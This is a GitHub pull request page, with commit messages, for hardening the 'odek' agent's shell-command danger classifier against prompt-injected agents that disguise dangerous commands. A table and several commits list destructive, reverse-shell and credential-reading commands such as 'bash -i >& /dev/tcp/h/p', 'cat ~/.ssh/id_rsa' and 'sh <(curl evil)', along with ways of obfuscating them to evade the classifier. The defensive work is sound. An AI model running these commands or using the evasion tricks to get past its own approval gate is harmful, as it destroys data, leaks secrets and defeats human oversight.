harden(danger): close classifier evasion vectors + fail closed on unknown commands by jkyberneees · Pull Request #5 · BackendStack21/odek

jkyberneees · 2026-06-03T10:37:37Z

Why

The danger classifier is the approval gate's first line of defense. It must assume a prompt-injected agent is actively trying to disguise a dangerous command as harmless so it runs without a prompt. A deep review found several bypasses and a structural weakness: the gate failed open (anything unrecognized → Safe → allow). This PR closes the bypasses and flips the default to fail-closed.

Part 1 — Evasion vectors closed

Vector	Example	Before → After
Quote-split verb	`r""m -rf /`	safe → destructive
Pipe stage ignored	`true \| dd of=/dev/sda`	safe → destructive
Pipe stage ignored	`echo x \| sudo rm -rf /home/u`	safe → destructive
Exec wrapper masks verb	`env rm -rf /etc`, `xargs rm -rf /etc`	safe → destructive
sudo masks inner verb	`sudo rm -rf /var/log`	system_write → destructive
Shell `-c` payload	`bash -c 'rm -rf /'`	safe → destructive
Reverse shell	`bash -i >& /dev/tcp/h/p`	safe → network_egress
Sensitive read	`cat ~/.ssh/id_rsa`, `cat /proc/self/environ`	safe → system_write
Relative wipe	`rm -rf ~`, `rm -rf *`, `rm -rfv /etc`	local_write → destructive
Brace / ANSI-C	`{rm,-rf,/}`, `$'\x72\x6d' -rf /`	safe → destructive
Process subst into shell	`sh <(curl evil)`	network → code_execution
New tools	`socat`, `dig`, `npx`, `pnpm dlx`, `find … -exec`, `source`	safe → network/code_execution

Layers: tokenizer (quote boundaries are not word boundaries) · per-pipe-stage classification · wrapper unwrapping (env/xargs/sudo/… ) · verb-independent resource scan (/dev/tcp, sensitive paths) · payload re-classification (bash -c, <(…)) · ANSI-C + brace normalization · broadened rm/dd/network/exec/install detection.

Part 2 — Fail closed on unknown commands

Previously a command whose verb matched no check fell through to Safe (allow). Now:

New Unknown risk class, default action Deny (same as Destructive), ranked just below destructive so one unknown stage dominates benign siblings (pip install x && weirdverb → deny).
safeCommands — an explicit read-only/no-op allowlist (ls, cat, grep, sort, jq, stat, ps, benign builtins like cd/export, …) keeps ordinary inspection Safe. Mutating/code-executing tools are deliberately not here — they must be allowlisted, not slip through unclassified. A safe command with a write redirect or system/sensitive path is still escalated first.
Leading VAR=val assignments unwrapped (FOO=bar rm -rf / → rm); assignment-only is a no-op.
Side benefit: variable indirection ($X -rf /) now denies (unknown verb) instead of silently allowing.

Per-profile config: "unknown": "prompt" for a softer stance, or allowlist specific tools. Godmode (action: allow) still allows it, exactly like destructive. Note: in the default profile this means an unrecognized command (e.g. make, cargo build) is now denied unless allowlisted — that is the intended fail-closed posture.

Docs & tests

Classifier package doc rewritten: threat model, layered design, fail-closed default, and explicit limitations (variable indirection, dynamic construction, non-enumerated transforms, known-verb escape hatches). hardening_test.go pins every closed vector + the fail-closed / assignment-unwrap / safe-allowlist behavior; benign commands guarded against over-classification. Two existing expectations updated (sudo rm -rf /var/log → destructive; rank/ActionFor for the new class). Full go test ./... green; go vet clean.

🤖 Generated with Claude Code

The risk classifier is the approval gate's first line of defense, so it must assume a prompt-injected agent is actively trying to disguise a dangerous command as harmless. A review surfaced several bypasses where a destructive/exfiltrating command under-classified to safe/local_write (i.e. ran without a prompt). This closes them in layers: Tokenizer - Quote boundaries are no longer word boundaries: r""m, "rm", r''m all resolve to `rm` again (empty/adjacent quotes used to split the verb). Structural decomposition - Every pipe stage is classified, not just the head command, so `true | dd of=/dev/sda`, `: | wget … -O /tmp/x` and `echo x | sudo rm -rf /home` are seen for what their later stages do. Wrapper unwrapping - Leading exec wrappers (env, xargs, nohup, nice, setsid, timeout, …) are stripped so the real command is classified; sudo/doas/pkexec set a system_write floor and let the inner command escalate (sudo rm -rf /var → destructive, instead of being masked as system_write). Verb-independent resource scanning - /dev/tcp and /dev/udp (reverse-shell channels) → network_egress. - Reads/writes of sensitive credential paths (~/.ssh, /etc/shadow, ~/.aws/credentials, /proc/self/environ, …) → system_write. Payload re-classification & normalisation - bash/sh -c '…' payloads and <(…)/>(…) process substitutions are re-classified (a shell given anything to execute → code_execution). - New normalisation passes: ANSI-C $'\x72\x6d', brace expansion {rm,-rf,/}. Detection coverage - rm: robust recursive/force flag parsing (-rfv, -Rf, --recursive --force) and relative wipe targets (~, $HOME, *, ., ..). - dd: broadened raw block-device list (vd/hd/xvd/mmcblk/disk/loop/dm). - network: socat, rclone, dig/nslookup/host/drill, aria2c/axel/httpie. - code exec: source/., npx/bunx/uvx/pipx, pnpm|yarn dlx, uv run, find -exec. - install: pnpm/yarn/bun/apk add|install. The package doc now states the threat model, the layered design, and the explicit limitations (variable indirection, dynamic construction, non-enumerated transforms) — this is defence-in-depth, not a sandbox, so it errs toward over-classification (an extra prompt) over silent misses. One existing expectation updated: `sudo rm -rf /var/log` is now destructive (was system_write) — the more accurate, more secure class. New hardening_test.go pins each closed vector and guards benign commands against over-classification. Full suite green; go vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

Previously the classifier fell through to Safe (allow) for any command it didn't recognise, so the whole gate was fail-open: a novel or obfuscated verb that dodged every known-dangerous check ran unprompted. Flip it to fail-closed: - New Unknown risk class, default action Deny (same as Destructive), ranked just below Destructive so a single unknown stage dominates benign siblings in a pipeline/compound command. - classifyCommand now returns Safe only for a recognised command used benignly, and Unknown otherwise. - safeCommands: an explicit read-only/no-op allowlist (ls, cat, grep, sort, jq, stat, ps, git via existing prefixes, cd/export and other benign builtins, …) so ordinary inspection still classifies Safe. Mutating/code-executing tools are deliberately excluded — they must be allowlisted, not slip through unclassified. A safe command given a write redirect or system/sensitive path is still escalated first. - Leading VAR=val assignments are unwrapped (FOO=bar rm -rf / → rm), and an assignment-only command is a no-op (Safe). Side benefit: the variable-indirection limitation now denies rather than silently allows — `$X -rf /` reads as an Unknown verb. Configurable like any class: set "unknown": "prompt" for a softer profile, or use the allowlist for specific trusted tools. Godmode (action: allow) still allows it, exactly like Destructive. Docs and tests updated (rank/ActionFor expectations; new fail-closed, assignment-unwrap, and safe-allowlist coverage). Full suite green; vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

…wn class Extend the user-facing guide for setting up the "dangerous" approval policy, and bring the security/CLI/dev docs in line with the new 9-class model (adds the fail-closed `unknown` class). DOCKER_COMPOSE_USER_GUIDE.md §5a now has a full field-by-field setup guide for the restricted profile: - what each key does (sandbox/action/non_interactive/classes/allow/deny) - the 9-class table with built-in vs profile actions - the action-resolution precedence (allowlist → denylist → classes → blocked → action → built-in default → non_interactive) - a gotcha: a global "action" overrides EVERY unlisted class, so the shipped restricted profile prompts even on `safe` (`ls`) unless you add "safe": "allow" or omit "action" — both shown - customisation recipes (tighten / loosen / allowlist one tool / lockdown) CLI.md, SECURITY.md, DEVELOPMENT.md: add the `unknown` class, state the fail-closed default, refresh the evasion list and regression-suite pointers. No code changes. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

Keep all documentation under docs/. Update the in-file Reference links (docs/X.md → X.md, now siblings) and the inbound pointer from docker/README.md (../ → ../docs/). Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

Self-review of the fail-closed change surfaced consumers that enumerate risk classes but were never taught about the new Unknown class, plus two classifier correctness bugs. Fixes: 1. Sub-agent risk caps ignored Unknown (cmd/odek/subagent.go). The mirror riskRank() had no Unknown case (returned 0) and the untrusted + maxRisk clamp loops didn't list it. Result: max_risk="unknown" denied even Safe, and a capped/untrusted sub-agent never force-denied Unknown when the inherited config loosened it. Root cause was the duplicated ranking, so export danger.Rank as the single source of truth (rank→Rank) and have subagent.go use it; add danger.Unknown to both clamp loops. 2. Trust-class shortcut allowed Unknown (internal/danger/approver.go, cmd/odek/wsapprover.go). "Trust class for session" was disabled only for Destructive/Blocked, so a single grant could blanket-approve every future unrecognised verb — the exact approval-fatigue attack the exclusion exists to stop. Exclude Unknown too. 3. dd to a character device misclassified destructive (classifier.go). isDestructive's of= branch matched any "/dev/" substring, so the common `dd ... of=/dev/null` / `of=/dev/stdout` idioms were denied. Use the precise containsBlockDevice matcher (also dedupes the device logic). 4. ANSI-C octal over-read (classifier.go decodeEscape). The loop consumed up to 4 octal digits; bash takes at most 3. `$'\1551'` now decodes to "m1" (octal 155 + literal 1), matching the shell, not a single byte. Regression tests added for each; rank→Rank rename propagated through the danger package and its tests. Full suite green; go vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

Follow-up to the Unknown-class fixes — the lower-severity review items: 5. shell tool description (cmd/odek/shell.go): add the `unknown` class and state the fail-closed default, so the model driving the tool can reason about why an unrecognised command was denied. 6. sensitivePathFragments (classifier.go): document why it is deliberately separate from ClassifyPath's home-sensitive-dir list (token-substring, credential reads vs absolute-path write-risk) so the overlap doesn't get "deduped" into a behavior change, and so a maintainer updating one considers the other. 7. safeCommands (classifier.go): extend the read-only allowlist with common modern CLIs (fd, eza/exa/lsd, htop/btop/glances, pstree/procs, duf, dust, delta, hexyl, glow) so fail-closed doesn't deny routine inspection. 8. classifyStage (classifier.go): pass a pipedInto flag instead of having classifyPipeline re-run unwrapWrappers on each non-head stage purely to read the head command — one unwrap per stage now. 9. hasSystemRedirectTarget → touchesSystemPath (classifier.go): the function flags ANY system-path token, not just redirect targets, and is NOT redundant with isSystemWrite (verified: it catches `cat /etc/foo` and unknown tools pointed at /usr, and runs after isLocalWrite). Renamed for accuracy with a comment on why both checks exist. Behavior change is limited to #7 (more tools classify Safe). Regression test for the new safe tools added. Full suite green; go vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

CodeQL flagged incorrect type conversion: strconv.ParseUint was parsing into a 16-bit target (8, 16) then casting to uint8 without bounds checking. Since octal escapes in bash are always mod 256 (fit in uint8), parse directly as 8-bit (8, 8) to ensure the conversion is safe and eliminate the CodeQL warning. All tests pass including TestHardening_ANSICOctalDigitCap. Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>

@macros

#7) * feat(schedule): native in-process scheduler core (phase 1) Introduce internal/schedule — the engine for odek's native cron capability, replacing the Docker + supercronic approach. Running in-process means the host already has resolved config (API key, model, bot token, default chat) in memory, so a scheduled task sees exactly what an interactive one does — no environment-inheritance games, no external cron daemon, no container-only behaviour. This phase is the standalone core only — no CLI or bot wiring yet. - types.go: Job / Delivery / RunState. Definitions and runtime state persist to separate files so a hand-edit never races a state write. - cronexpr.go: stdlib-only 5-field cron parser (ranges, steps, lists, names, @macros) with correct Vixie dom/dow union semantics, timezone-aware Next() via coarse unit-stepping, and a horizon that clears the leap-century gap. - store.go: atomic (temp+rename, 0600) CRUD for schedules.json and schedule-state.json, mirroring session.Store; validates jobs on write. - scheduler.go: firing engine decoupled from the agent/telegram via Runner and Deliverer interfaces. Earliest-fire timer (no per-minute polling), bounded concurrency, per-job overlap guard, missed-run skip/catchup policy, mtime hot-reload, and graceful drain on context cancellation. Tests: 39 cases, 87.9% coverage, green under -race. Parser table tests (ranges/steps/lists/names/macros/dom-dow union/leap day/timezone/errors); engine tests drive reconcile/fireDue directly with explicit clocks plus one real-clock lifecycle test — deterministic, no flaky sleeps. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): odek schedule CLI + headless runner/deliverers (phase 2) Wire the scheduler core into the CLI and give it a way to actually run tasks. - cmd/odek/schedule.go: `odek schedule <list|add|rm|enable|disable|run|next|daemon>`. * add: flag-parsed (--name/--cron/--deliver/--tz/--catchup/--disabled) with a trailing task; validates and shows the next fire. * list: tabular view with computed next-fire (local time) and last status. * next: previews upcoming fires for a job ID or a raw expression. * run: fires one job immediately and delivers (test a job). * daemon: foreground scheduler with a singleton pid lock (refuses a second instance rather than usurping a live one) and graceful SIGINT/SIGTERM drain. - runTaskHeadless: builds a fresh agent with a silent (io.Discard) renderer, interaction off, and no approver — the resolved danger policy governs what an unattended task may do, mirroring non-interactive `odek run`. - agentRunner / cliDeliverer implement the schedule.Runner / schedule.Deliverer interfaces; delivery routes to stdout, ~/.odek/schedule.log, or Telegram (honouring a per-job chat ID, falling back to default_chat_id). - dispatch + printUsage wired for the new command. Tests cover parseDeliver, deliverString, firstWords, jobSchedule, and the deliverer branches (log append, telegram misconfig errors, unknown kind). Smoke-tested end to end: add/list/next/enable/disable/rm, schedules.json at 0600, and daemon start → second-instance refused → clean SIGINT drain. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): run the scheduler inside odek telegram (phase 3) The Telegram bot now hosts the scheduler in-process, so reminders and the bot share one runtime — the whole reason to go native. No separate cron daemon, no environment-inheritance problem. - startSchedulerForBot: launched after the poller, stopped on ctx cancel. It acquires the shared schedule pid-lock; if an external `odek schedule daemon` already holds it, the bot defers (logs and skips) rather than double-firing. - telegramRunner: runs each job headless and accounts token usage against the bot's daily budget — pre-flight refuse when exhausted, bill the run after. - telegramDeliverer: delivers via the LIVE bot for telegram jobs (sharing its client and 429 backoff) and falls back to the CLI deliverer for stdout/log. - runTaskHeadless now captures cumulative tokens via an IterationCallback, so the Runner's token count is real (engine logs it; bot bills it). - Graceful restart releases the schedule lock before os.Exit, mirroring the Telegram instance lock, so the restarted child's scheduler re-acquires cleanly. Tests: embedded deliverer routing — live-bot send, default-chat fallback, no-chat error, and stdout/log fallback — via the recording test bot. Full cmd/odek suite green under -race; whole module suite green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): schedules config section + docs (phase 4) Make the scheduler configurable and documented. - internal/config: new `schedules` section (enabled, max_concurrent, timezone, catchup) with the same file→env→default layering as every other section. resolveSchedules + ODEK_SCHEDULES_* env overrides + overlayFile handling. Defaults: enabled=true, max_concurrent=2, timezone=UTC, catchup=false. - cmd/odek: the daemon and the embedded (bot) scheduler now build their engine Options from resolved.Schedules via a shared schedulerOptions helper (max-concurrent, default timezone, catchup). The embedded scheduler is gated on schedules.enabled so it can be turned off in favour of a standalone daemon. - docs: new docs/SCHEDULES.md (canonical guide — runtime models, CLI, cron syntax incl. Vixie dom/dow coupling, delivery, the unattended-safety policy, config, missed-run behaviour); a Schedules section in CONFIG.md; a feature bullet in README. Tests: resolveSchedules defaults/overrides/partial, and LoadConfig wiring for defaults and ODEK_SCHEDULES_* env. Full config + schedule + cmd suites green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(docker): retire supercronic, use the native scheduler (phase 5) The bot now hosts the in-process scheduler (phase 3), so the container needs no external cron at all. Remove the supercronic scaffolding entirely. - Dockerfile: drop the supercronic download (and its ARG TARGETARCH/SHA pin), the ~/.crontabs dir, and the cron-entrypoint.sh wrapper. ENTRYPOINT is back to ["odek"]. The image no longer needs --build-arg TARGETARCH. - docker-compose: remove the ./crontab bind mounts from both telegram services. Keep init: true (now justified generally — reap agent-spawned children and forward SIGTERM), with an honest comment. - Delete docker/cron-entrypoint.sh and docker/crontab. - spawnChild: remove the now-dead ODEK_ENTRYPOINT re-exec branch (it only existed to restart supercronic via the wrapper). A restarted `odek telegram` starts its own embedded scheduler goroutine; gracefulRestart still releases the schedule lock so the child re-acquires cleanly. Drop the two obsolete ODEK_ENTRYPOINT tests. - docs: docker/README + .env.example now describe the native scheduler (`odek schedule`, jobs in ./.odek/schedules.json); TELEGRAM.md points to SCHEDULES.md from its OS-cron section. Validated: image builds without TARGETARCH, supercronic absent from the image, ENTRYPOINT runs odek, and `odek schedule next` works inside the container. Compose config valid; full module suite green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * fix(schedule): address code-review findings Ten findings from the high-effort review of the native scheduler: #1 (security) Unattended tasks could silently run dangerous ops: a nil approver with no TTY falls back to NonInteractiveAction(), which defaults to ALLOW. Set a "deny" floor in runTaskHeadless when the policy doesn't explicitly choose one (mirrors sub-agent hardening); explicit allow/deny (godmode/restricted) honoured. #2 (correctness) cron parseField flagged a dom/dow field as a wildcard whenever it merely started with "*", so a list like "*/2,15" broke the Vixie union rule (AND instead of OR). Now star is set only when EVERY comma item is wildcard-based. #3 (correctness) The Run loop did a blocking `sem <- {}` in fireDue, so MaxConcurrent hung jobs wedged shutdown/reload. Now the sem acquire selects on ctx (clearing the overlap guard for undispatched jobs), and each run is bounded by Options.RunTimeout (default 15m). #4 (correctness) Budget pre-check used CheckDailyBudget(1), which persists +1 per fire. Switched to read-only DailyTokenUsage() for the gate; actual cost still billed after the run. #5 (robustness) acquireScheduleLock now does a /proc/<pid>/cmdline identity check so a recycled PID can't make the scheduler refuse to start forever; pid file tightened to 0600. #6 (correctness) Missed-run detection trusted a persisted NextRun even after the cron changed while down. RunState now records the schedule signature; reconcile ignores NextRun when the sig differs (no spurious catchup/skip). #7 (efficiency) MCP servers were reconnected per fire. They're now connected once at daemon/bot startup and shared across fires (the MCP client is mutex-safe); builtin tools stay fresh per fire. #8 (efficiency) reconcile re-parsed cron + LoadLocation for unchanged jobs every reload. The sig short-circuit now runs before compile(). #9 (cleanup) Hoisted the repeated `cfg.Schedules == nil` guard in loader.go. #10 (cleanup) Daemon reuses telegram.NewFileLogger instead of a hand-rolled stderrLogger (deleted). Tests: cron union for step-lists + plain-step-still-wildcard; cron-changed-while- down (no false catchup); fireDue unblocks on ctx cancel with a full semaphore. Full suite green under -race, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * fix(schedule): address ultrareview findings Nine findings from the cloud multi-agent review. bug_005 (normal) Impossible cron expressions (e.g. "0 0 30 2 *", Feb 30) passed Validate but Next() returns the zero time, which the engine treated as perpetually due → fired every tick forever, burning tokens. Now Validate rejects them at add time, and reconcile/fireDue defensively skip a zero next-fire (for hand-edited files). bug_009 (normal) The embedded scheduler's stop closure tore down shared MCP connections and the lock without waiting for in-flight jobs to drain, causing broken-pipe errors persisted as bogus failure state. The closure now waits on a done channel (20s bound) before cleanup. bug_013 (normal) gracefulRestart calls os.Exit(0), which skips deferred stopScheduler → mcpCleanup never ran → MCP child processes (Playwright/Chromium) leaked on every /restart. Added mcpCleanupRef, invoked before os.Exit like scheduleUnlockRef. bug_007 (normal) reconcile reseeded s.runs from disk in the unchanged branch, clobbering an in-flight fire's increment → lost Runs counts. It now skips the reseed for unchanged/running jobs. Also moved the missed-fire SaveState out of the s.mu critical section and stopped swallowing its error. bug_004 (normal) runTaskHeadless used RunWithMessages with a bare system message, so RuntimeContext (host/cwd/date) never reached the LLM — date-aware jobs ("summarize today's calendar") had no notion of "today". Switched to agent.Run, which prepends the engine's runtime-context-inclusive system message. bug_014 (nit) Deliverer.Deliver took no context, so a stuck Telegram send blocked the drain. Added ctx to the interface + bot.SendMessageContext; the scheduler passes the run ctx through. bug_015 (nit) Concurrent CLI mutations could lose writes (read-modify-write with only an in-process mutex). Added an flock on ~/.odek/schedules.lock around the store's write methods. bug_006 (nit) scheduleNext swallowed store errors → misleading "bad cron" on a corrupt store. It now returns the store error. bug_002 (nit) docker/README + SCHEDULES.md misdescribed the lock as symmetric; reworded to note the bot defers silently while the daemon refuses to start. Tests: impossible-cron rejected (Validate) + skipped (reconcile); unchanged reconcile preserves in-memory Runs. Full suite green under -race, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * test(schedule): cover error paths and edge cases to 99.6% Add targeted tests for the native scheduler package and its CLI glue, raising internal/schedule statement coverage from 87.8% to 99.6% (the only remaining gap is the best-effort flock syscall-error fallback). internal/schedule/coverage_test.go exercises: - store error paths: NewStore HOME failure, NewStoreAt mkdir failure, corrupt-file loadDoc/loadState propagation across all CRUD methods, writeJSONAtomic marshal/write/rename failures, version defaulting, null states map, fileLock open failure, and the List ID tiebreak. - scheduler branches: reload-on-mtime-change, reconcile List/LoadState errors, skip- and execute-time SaveState failures, zero next-fire drop, timeToNext empty/past/near cases, compile bad-timezone, and preview truncation. - cronexpr branches: nil-location default, empty field, range/empty value parse errors, and a month mismatch in Matches. cmd/odek/schedule_cli_test.go covers the non-LLM CLI surface: list, add, rm, enable/disable, next, command dispatch, scheduler options, MCP no-op, schedule lock acquire/release, embedded-scheduler lifecycle, and the telegram budget gate. * docs: make docs consistent with the native scheduler The native scheduler landed with its own docs (SCHEDULES.md, CONFIG.md, TELEGRAM.md, docker/*) but left a few cross-references stale or missing. Bring the rest of the docs in line: - README.md: add the missing Scheduled Tasks row to the docs index (the feature section already linked SCHEDULES.md). - docs/index.html: add a Scheduled Tasks feature card mirroring README. - docs/CLI.md: list 'odek schedule' (and the previously-omitted 'odek telegram') in the command table; point '--deliver' at the native scheduler for recurring tasks. - docs/CHEATSHEET.md: add a schedule quick-reference (and telegram). - docs/DAILY-WORKER.md: correct the comparison table — odek now has native, in-process scheduling rather than 'None'. * feat(schedule): manage schedules from Telegram Add /schedules and /schedule slash commands so an authorized Telegram user can list, view, preview, add, enable/disable, remove, and test-run scheduled tasks without leaving the chat — closing the gap where the native scheduler was CLI/file-only. Command layer (cmd/odek/schedule_telegram.go): - /schedules lists jobs; /schedule <sub> dispatches add|view|next|run| enable|disable|rm|help. - add uses cron's fixed arity (an @macro or 5 fields) so no quoting is needed; options follow a literal '|' (deliver=, tz=, name=, catchup, disabled). Telegram delivery defaults to the originating chat. - run returns the job's task for the bot to dispatch through the normal agent pipeline (progress + approvals visible), test-running it in chat. - Replies use the existing MarkdownV2 pipeline; cron/IDs are wrapped in code spans to stay literal. Wiring: - Scheduler gains Reload() (buffered, coalescing) and a select case so in-chat edits reconcile immediately instead of waiting for the mtime poll; startSchedulerForBot now takes the shared store and publishes its Reload via scheduleReloadRef. - telegram.go creates one schedule.Store, shares it with the embedded scheduler, and intercepts the two commands in OnCommand. Safety/config: - New schedules.allow_telegram_management (default true, env ODEK_SCHEDULES_ALLOW_TELEGRAM_MANAGEMENT) gates the mutating verbs; read-only listing/preview always works. Access is already bounded by the bot's allowed_chats/allowed_users. Docs: SCHEDULES.md gains a 'Managing from Telegram' section; TELEGRAM.md, CONFIG.md, docker/README.md and .env.example updated. Tests cover the parser, every subcommand, the management gate, and the Reload trigger. * fix(schedule): format scheduled results for Telegram MarkdownV2 Scheduled task results were sent raw, so odek markdown like **bold** arrived as literal asterisks. Route both the CLI and embedded-bot deliverers through sendTelegramResult, which mirrors the live bot's SendResponse pipeline: convert to MarkdownV2, chunk via FormatResponse, and retry each chunk as plain text if Telegram rejects the formatting. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

github-advanced-security AI found potential problems Jun 3, 2026

View reviewed changes

Comment thread internal/danger/classifier.go Fixed

jkyberneees changed the title ~~harden(danger): close shell-command classifier evasion vectors~~ harden(danger): close classifier evasion vectors + fail closed on unknown commands Jun 3, 2026

jkyberneees and others added 2 commits June 3, 2026 12:59

jkyberneees force-pushed the harden/command-classifier branch from 1453a50 to 91343e3 Compare June 3, 2026 11:02

github-advanced-security AI found potential problems Jun 3, 2026

View reviewed changes

Comment thread internal/danger/classifier.go Fixed

jkyberneees and others added 2 commits June 3, 2026 13:29

jkyberneees merged commit 1469af1 into main Jun 3, 2026
6 checks passed

jkyberneees deleted the harden/command-classifier branch June 6, 2026 06:37

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

harden(danger): close classifier evasion vectors + fail closed on unknown commands#5

harden(danger): close classifier evasion vectors + fail closed on unknown commands#5
jkyberneees merged 7 commits into
mainfrom
harden/command-classifier

jkyberneees commented Jun 3, 2026 •

edited

Loading

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

jkyberneees commented Jun 3, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Why

Part 1 — Evasion vectors closed

Part 2 — Fail closed on unknown commands

Docs & tests

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

jkyberneees commented Jun 3, 2026 •

edited

Loading